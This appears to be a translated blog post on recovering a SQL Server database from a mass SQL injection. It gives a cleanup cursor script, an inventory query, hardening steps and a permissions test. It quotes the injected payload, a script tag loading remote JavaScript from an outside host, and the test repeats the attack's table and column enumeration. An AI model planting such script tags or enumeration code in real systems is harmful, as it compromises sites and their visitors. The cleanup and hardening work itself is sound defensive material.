  • The website was injected

    How can this be removed as quickly as possible?
    "<script src=http://3b3.org/c.js> </script>"
    ---------------------------------------------------------------
    Open SQL Query Analyzer.
    Select your database.
    Step 1: change the owner of every table to dbo
    EXEC sp_MSforeachtable 'exec sp_changeobjectowner ''?'', ''dbo'''

    Step 2: remove the injected JS from every affected column in one pass
    declare @delStr nvarchar(500)
    -- Must match the injected string exactly as it is stored (check the whitespace inside it)
    set @delStr='<script src=http://3b3.org/c.js> </script>'

    set nocount on

    -- sysname covers full-length identifiers; @sql is sized so long names are not truncated
    declare @tableName sysname,@columnName sysname,@tbID int,@iRow int,@iResult int
    declare @sql nvarchar(2000)

    set @iResult=0
    -- Outer cursor: every user table
    declare cur cursor for
    select name,id from sysobjects where xtype='U'

    open cur
    fetch next from cur into @tableName,@tbID

    while @@fetch_status=0
    begin
        -- Inner cursor: the string columns of the current table
        declare cur1 cursor for
        --xtype 231=nvarchar, 167=varchar, 239=nchar, 175=char, 35=text
        --REPLACE does not accept text columns, so the update raises an error for those and they need separate handling
        select name from syscolumns where xtype in (231,167,239,175,35) and id=@tbID
        open cur1
        fetch next from cur1 into @columnName
        while @@fetch_status=0
        begin
            -- Strip the injected string from rows that contain it
            set @sql='update [' + @tableName + '] set ['+ @columnName +']= replace(['+@columnName+'],'''+@delStr+''','''') where ['+@columnName+'] like ''%'+@delStr+'%'''
            exec sp_executesql @sql
            set @iRow=@@rowcount
            set @iResult=@iResult+@iRow
            if @iRow>0
            begin
                -- Message: table, column, number of rows updated
                print '表:'+@tableName+',列:'+@columnName+'被更新'+convert(varchar(10),@iRow)+'条记录;'
            end
            fetch next from cur1 into @columnName
        end
        close cur1
        deallocate cur1

        fetch next from cur into @tableName,@tbID
    end
    -- Message: total number of rows updated in the database
    print '数据库共有'+convert(varchar(10),@iResult)+'条记录被更新!!!'

    close cur
    deallocate cur
    set nocount off
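
    A read-only inventory that can be run before the update in step 2, added here as an example (it is not part of the original post): it counts the affected rows per column without changing any data, binds the search string as a parameter and brackets identifiers with QUOTENAME. The temp table #hits and its column names are made up for this example, and it assumes every table is owned by dbo, as after step 1.

    ```sql
    -- Added example, not from the original post. Nothing is modified.
    declare @delStr nvarchar(500), @pattern nvarchar(510)
    -- Same string as in step 2; it must match what is stored in the data
    set @delStr = N'<script src=http://3b3.org/c.js> </script>'
    set @pattern = N'%' + @delStr + N'%'

    -- #hits is a made-up name for this example
    create table #hits (tableName sysname, columnName sysname, hitRows int)

    declare @tableName sysname, @columnName sysname, @sql nvarchar(1000), @n int

    -- Same column types as the cleanup script (nvarchar, varchar, nchar, char, text)
    declare cur cursor local fast_forward for
        select o.name, c.name
        from sysobjects o
        join syscolumns c on c.id = o.id
        where o.xtype = 'U'
          and c.xtype in (231,167,239,175,35)

    open cur
    fetch next from cur into @tableName, @columnName
    while @@fetch_status = 0
    begin
        -- Reset so a failed statement cannot leave the previous count behind
        set @n = 0
        -- Identifiers are bracketed by QUOTENAME; the pattern is a bound parameter,
        -- so quotes in the search string cannot change the statement
        set @sql = N'select @n = count(*) from dbo.' + quotename(@tableName)
                 + N' where ' + quotename(@columnName) + N' like @pattern'
        exec sp_executesql @sql,
             N'@pattern nvarchar(510), @n int output',
             @pattern, @n output
        if @n > 0
            insert into #hits values (@tableName, @columnName, @n)
        fetch next from cur into @tableName, @columnName
    end
    close cur
    deallocate cur

    -- One row per affected column, largest first
    select tableName, columnName, hitRows from #hits order by hitRows desc
    drop table #hits
    ```

    LIKE works on text columns, so this listing also shows the text columns that the REPLACE-based update cannot clean.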
    ---------------------------------------------------------------
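    Stopping SQL injection for good

    1. Do not connect to the database as the sa user.
    2. Create a new database user that has only public permissions, and access the database as that user.
    3. [Role] Remove the public role's SELECT permission on the sysobjects and syscolumns objects.
    4. [User] User name -> right-click -> Properties -> Permissions -> mark sysobjects and syscolumns with "×" (deny).
    5. Test with the following code (a failure means the permissions are correct; if the column names are displayed, the permissions are too high):
    DECLARE @T varchar(255),
    @C varchar(255)
    -- Enumerates the string columns of every user table, which needs SELECT on sysobjects and syscolumns
    DECLARE Table_Cursor CURSOR FOR
    Select a.name,b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
        print @C
        FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor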
  • Original article: https://www.cnblogs.com/dfsxh/p/1449916.html